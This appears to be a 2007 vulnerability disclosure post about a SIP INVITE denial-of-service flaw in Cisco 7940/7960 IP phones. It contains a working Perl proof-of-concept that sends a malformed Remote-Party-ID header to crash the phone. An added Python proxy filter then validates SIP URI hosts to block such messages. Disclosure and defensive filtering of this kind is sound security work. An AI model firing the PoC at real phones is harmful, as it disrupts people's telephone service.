Wednesday, 21 March 2007

Cisco IP Phone 7940/7960 vulnerable to DoS

Ok, this is bad. The Cisco IP Phone 7940/7960 is vulnerable to a DoS. Sending it a malformed, crafted SIP INVITE message causes the phone to reboot, because the phone does not check the validity of the sipURI field of the remote party. This affects Cisco IP Phone 7940/7960 units running firmware P0S3-07-4-00.

Unaffected firmware: POS8-6-0



Ok, so I am not vulnerable. :)

Proof of Concept:

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 " unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
                                  Proto=>'udp',
                                  PeerAddr=>$ARGV[0]);

$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: \r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

#end
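
A defensive counterpart to the missing check described above, as an added example that is not part of the original post: a filter that a SIP proxy or border element could run on incoming requests, validating the host of every Remote-Party-ID URI against the RFC 3261 host grammar before the message reaches a phone. The function names and the sample messages are constructed for illustration.

```python
import re

# RFC 3261 host forms: IPv4 address, DNS hostname, or bracketed IPv6 reference.
IPV4 = re.compile(rb"(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\Z")
HOSTNAME = re.compile(
    rb"(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)*"
    rb"[A-Za-z](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.?\Z")
IPV6REF = re.compile(rb"\[[0-9A-Fa-f:.]+\]\Z")
# sip:/sips: scheme, optional userinfo, then the host up to port, params or '>'.
SIP_URI = re.compile(
    rb"(?i)(?<![A-Za-z])sips?:(?:[^@\s<>]*@)?(\[[^\]\s]*\]|[^\s:;?<>]*)")

def host_ok(host: bytes) -> bool:
    """True if host is a syntactically valid RFC 3261 host."""
    if not host or len(host) > 255:
        return False
    m = IPV4.match(host)
    if m:
        return all(int(octet) <= 255 for octet in m.groups())
    return bool(HOSTNAME.match(host) or IPV6REF.match(host))

def check_remote_party_id(raw: bytes) -> list:
    """Return findings for Remote-Party-ID headers; an empty list means clean."""
    findings = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    head = re.sub(rb"\r\n[ \t]+", b" ", head)   # unfold continuation lines
    for line in head.split(b"\r\n")[1:]:         # skip the request line
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"remote-party-id":
            continue
        m = SIP_URI.search(value)
        if not m:
            findings.append("no SIP URI in Remote-Party-ID")
        elif not host_ok(m.group(1)):
            findings.append("invalid host in Remote-Party-ID URI: %r" % m.group(1))
    return findings

# Constructed sample messages (not captured traffic).
BASE = (b"INVITE sip:1001@192.0.2.10 SIP/2.0\r\n"
        b"Via: SIP/2.0/UDP 192.0.2.20;branch=z9hG4bKexample\r\n"
        b"Call-ID: example@192.0.2.20\r\nCSeq: 1 INVITE\r\n")
GOOD = BASE + b'Remote-Party-ID: "Alice" <sip:1001@192.0.2.20>;party=calling\r\n\r\n'
BAD = BASE + b"Remote-Party-ID: <sip:1001@192.0.\xd1.20>\r\n\r\n"

if __name__ == "__main__":
    for label, msg in (("GOOD", GOOD), ("BAD", BAD)):
        print(label, check_remote_party_id(msg) or "clean")
```

A request that returns any finding can be rejected or logged at the proxy instead of being forwarded to the handset.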
